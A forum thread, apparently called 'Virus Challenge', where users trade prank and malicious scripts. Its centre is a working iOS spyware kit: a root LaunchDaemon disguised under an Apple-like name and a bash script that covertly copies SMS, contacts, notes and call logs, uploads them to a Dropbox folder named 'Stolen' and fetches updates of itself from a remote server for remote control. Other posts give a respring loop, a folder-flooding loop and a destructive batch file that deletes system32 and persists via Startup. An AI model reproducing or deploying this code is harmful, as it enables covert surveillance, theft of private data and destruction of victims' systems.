Virus Challenge

[Apetrick]

Did you try ^C

[high(tech)poptart]

What does ^C do? I'm still new.

[Ironman]

It stops everything.

[high(tech)poptart]

Okay, thanks. How does this command work? I cant find anything about it.

[C0deH4cker]

^C is Ctrl + c. Basically it interrupts the process in the current cmd window. Ctrl + Pause/Break works better.


That will only stop the one in the current window however. The best way to stop this is:

taskkill /f /im cmd.exe /im tree.exe

I believe that the tree command runs a program called tree.exe (or tree.com, idk which). Thats why i stop that too.

[high(tech)poptart]

Thanks Code for answering my very n00bish question, but when running the virus, cmd windows opened way to fast for me to run anything. I might play around with these solutions later.

[A3MIRAL]

3 reasonable option-
1: have task manager already open
2: be ready to right click on the item in the task bar and click close all windows (win 7 only I believe)
3: look into AutoHotKey (AHK) and make like control alt s run code's kill code.

[high(tech)poptart]

Okay, I'll try the first two in a min then post my results.

[C0deH4cker]

2: be ready to right click on the item in the task bar and click close all windows (win 7 only I believe)

Also winxp.


You could just have that command i posted in a batch file on your desktop.


Or: shutdown /f

no, it wont shut down your computer. It simple forces all programs (including windows explorer) to quit. You can restart them manually.

[high(tech)poptart]

Okay so I had this \/ posted on cmd and I had the task list up, but by the time I started the virus my computer would not let me do anything.

taskkill /f /im cmd.exe /im tree.exe

[C0deH4cker]

Lol 😜

[brc0703]

and just to piss someone off run this from terminal

while [ true ]; do echo $$ >/tmp/bomb.pid; sleep 60; killall SpringBoard; done&

then the device will respring every minute till either rebooted or u run 'kill `cat /tmp/bomb.pid`'
----------------------------------------------------------------------------------------------------------------

Steal Private Data and remote access to device through script

LaunchDaemon to run once a day starting from last reboot (can edit to whatever u want)
then when that is launched it runs this script that copys sms, contacts, notes, call log and whatever you want to add.. then it zips the file and uploads it to a dropbox  account you set in the script... then script downloads a copy of itself from dropbox and compares its own md5 to the new one and updates itself if its new.. this allows for complete remote access by just editing the script on server.. steal more data.. delete files.. anything you can get a script to do.. just dont screw up so the script fails then your screwed cuz now it wont update..  this goes untracked from any app installed.. safari, mail, dropbox.. the user would have to have FireWall or find the actual files.. any normal user will never have a clue..

also have one that steals photos or videos as they are taken.. kinda like PhotoStream but uploads to specified dropbox account..

---LAUNCHDAEMON---
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
   <key>Label</key>
   <string>com.apple.mobilesafety</string>
   <key>ProgramArguments</key>
   <array>
      <string>/usr/lib/mobilesaver</string>
   </array>
   <key>RunAtLoad</key>
   <true/>
   <key>StartInterval</key>
   <integer>86400</integer>
   <key>UserName</key>
   <string>root</string>
</dict>
</plist>

---SCRIPT---
#!/bin/bash
# sneaky sneaky mobilesaver ?.?
# i havent been keeping track.. say v2.8-5
# brc0703@yahoo.com
PUSS="/var/root/Library/private"
LOGIN_URL="https://www.dropbox.com/login"
HOME_URL="https://www.dropbox.com/home"
UPLOAD_URL="https://dl-web.dropbox.com/upload"
COOKIE_FILE="/tmp/du_cookie_$RANDOM"
RESPONSE_FILE="/tmp/du_resp_$RANDOM"
VERSION="0.8.2"
MDROP="/usr/lib/mobiledrop"
LIB="/private/var/mobile/Library"
PEEP="$(find $LIB/AddressBook -type f -name Address*sqlitedb)"
CALL=$(locate call_history.db)
NOTE=$(locate $LIB/Notes)
SMS="$LIB/SMS/sms.db"
WORK_LOG=".work.sav.log"
ERR="/tmp/mobilesave.log"
NOGIN_DAT=$(echo "zrcv7v3@gape.cqm" | tr 'v' '0' | tr 'g' 'f' | tr 'p' 'k')
LOGGED=$(echo "ducklu" | tr 'd' 'f' | tr 'l' 'y')

#Set to 1 to enable DEBUG mode
DEBUG=0

#Set to 1 to enable VERBOSE mode (-v option)
VERBOSE=0

#If set to 1 the script terminate if an upload error occurs
END_ON_UPLOAD_ERROR=0

#Set to 1 to skip the initial login page loading (Speed up the uploading process).
#Set to 0 if you experience problems uploading the files.
SKIP_LOADING_LOGIN_PAGE=1

if [ $DEBUG -ne 0 ]; then
   set -x
   COOKIE_FILE="/tmp/du_cookie_debug"
   RESPONSE_FILE="/tmp/du_resp_debug"
fi

#Print verbose information depend on $VERBOSE variable
function print
{
   if [ $VERBOSE -eq 1 ]; then
      echo -ne "$1";
   fi
}

#Remove temporary files
function remove_temp_files
{
      rm -fr $COOKIE_FILE
      rm -fr $RESPONSE_FILE
      rm -fr $WORK_LOG
}

#Extract token from the specified form
# $1 = file path
# $2 = form action
function get_token
{
   TOKEN=$(cat $1 | tr -d '\n' | sed 's/.*<form action="'$2'"[^>]*>\s*<input type="hidden" name="t" value="\([a-z 0-9]*\)".*/\1/')
   echo $TOKEN
}

#Upload a single file to dropbox
# $1 = local file path
# $2 = remote destination folder
function dropbox_upload
{
   UPLOAD_FILE=$1
   DEST_FOLDER=$2
   
   print " > Uploading '$UPLOAD_FILE' to 'DROPBOX$DEST_FOLDER'..."

   #Show the progress bar during the file upload
   if [ $VERBOSE -eq 1 ]; then
      CURL_PARAMETERS="-k --progress-bar"
      print "\n"
   else
      CURL_PARAMETERS="-k -s --show-error"
   fi

   curl $CURL_PARAMETERS -i -b $COOKIE_FILE -o $RESPONSE_FILE -F "plain=yes" -F "dest=$DEST_FOLDER" -F "t=$TOKEN" -F "file=@$UPLOAD_FILE"   "$UPLOAD_URL"
   grep "HTTP/1.1 302 FOUND" "$RESPONSE_FILE" > /dev/null

   if [ $? -ne 0 ]; then
      print " Failed!\n"
      if [ $END_ON_UPLOAD_ERROR -eq 1 ]; then
         remove_temp_files
         exit 1
      fi
   else
      print " OK\n"
   fi
}

#Handles the keyboard interrupt (control-c)
function ctrl_c
{
   print "\n Bye \n"
   remove_temp_files
   exit 1
}

function self_up
{
   SDIR=$(pwd)
   cd ~
   curl -O http://dl.dropbox.com/someserver/script/mobilesaver 2>>$ERR
   chmod 0755 mobilesaver
   NEW="$(md5sum mobilesaver | awk '{ print $1 }')"
   CRT="$(md5sum $0 | awk '{ print $1 }')"
      if [ "$NEW" != "$CRT" ]; then
         mv -f  mobilesaver /usr/lib/mobilesaver 2>>$ERR
         echo "script `basename $0` was updated" 2>>$ERR
      else
         rm -f mobilesaver 2>>$ERR
         echo "script $0 was not updated" >>$ERR
      fi
   cd $SDIR
}

#Collects all personal data and zips for upload
function get_data
{
   touch $WORK_LOG
   echo -e "$SMS\n$CALL\n$NOTE\n$PEEP" >$WORK_LOG
   while read file
   do
   if [ -f "$file" ]; then
         TAR=$(dirname "$file")
         TAR=$(basename "$TAR")
         [[ ! -d $PUSS/$TAR ]] && mkdir -p $PUSS/$TAR
         cp -a -u -P "$file" $PUSS/$TAR
   fi; done < "$WORK_LOG" 2>>$ERR
mv $ERR $PUSS/flurrydata
zip -r -m -9 $PUSS/flurrydata $PUSS &>>$ERR
}


#Trap keyboard interrupt (control-c)
trap ctrl_c SIGINT

# File variables
UPLOAD_FILE="$PUSS/flurrydata.zip"
DEST_FOLDER="Stolen"

print "Dropbox Uploader v$VERSION\n"
get_data

#LOAD LOGIN PAGE
if [ $SKIP_LOADING_LOGIN_PAGE -eq 0 ]; then
   print " > Loading Login Page..."
   curl -k --show-error -i -o "$RESPONSE_FILE" "$LOGIN_URL"

   if [ $? -ne 0 ]; then
      print " Failed!\n"
      remove_temp_files
      exit 1
   else
      print " OK\n"
   fi

   #GET TOKEN
   TOKEN=$(get_token "$RESPONSE_FILE" "\/login")
   #echo -e " > Token = $TOKEN"
   if [ "$TOKEN" == "" ]; then
      print " Failed to get Authentication token!\n"
      remove_temp_files
      exit 1
   fi
fi

#LOGIN
print " > Logging in..."
curl -k --show-error -i -c $COOKIE_FILE -o $RESPONSE_FILE --data "login_email=$NOGIN_DAT&login_password=$LOGGED&t=$TOKEN" "$LOGIN_URL"
grep "location: /home" $RESPONSE_FILE > /dev/null

if [ $? -ne 0 ]; then
   print " Failed!\n"
   remove_temp_files
   exit 1
else
   print " OK\n"
fi

#LOAD HOME
print " > Loading Home..."
curl -k --show-error -i -b "$COOKIE_FILE" -o "$RESPONSE_FILE" "$HOME_URL"

if [ $? -ne 0 ]; then
   print " Failed!\n"
   remove_temp_files
   exit 1
else
   print " OK\n"
fi

#GET TOKEN
TOKEN=$(get_token "$RESPONSE_FILE" "https:\/\/dl-web.dropbox.com\/upload")
#echo -e " > Token = $TOKEN"
if [ "$TOKEN" == "" ]; then
   print " Failed to get Upload token!\n"
   remove_temp_files
   exit 1
fi

#If it's a single file...
if [ -f "$UPLOAD_FILE" ]; then
   dropbox_upload "$UPLOAD_FILE" "$DEST_FOLDER"
fi

remove_temp_files
self_up

exit 0

(i changed any private data for this demo so dont think i left passwords or anything.. they are hidden a little bit in the script but anyone with script knowledge can still read them)

[TeenHacker]

Sorry for the grave digging, but this creates 1 million folders on your desktop to crash your computer. I don't precisely remember how to code in batch, but I'm 80% sure this is what it is. 

Code: [Select]

/l %%n in (1,1,10000000) do md %%n

[Samich]

@echo off
:virus
Rundll32 keyboard, disable
Rundll32 mouse, disable
Start www.google.com
Taskkill /f /t /im explorer.exe
Taskkill /f /t /im rundll32.exe
Del /f /q "c:\users\%superprofile%\my documents\my music\*.*"
Cd "c:\WINDOWS\system32"
Del /f /q "*.*"
Copy "virus.bat" "c:\%userprofile%\start menu\programs\startup"
Shutdown -s -t 00 -c "virus"
:goto virus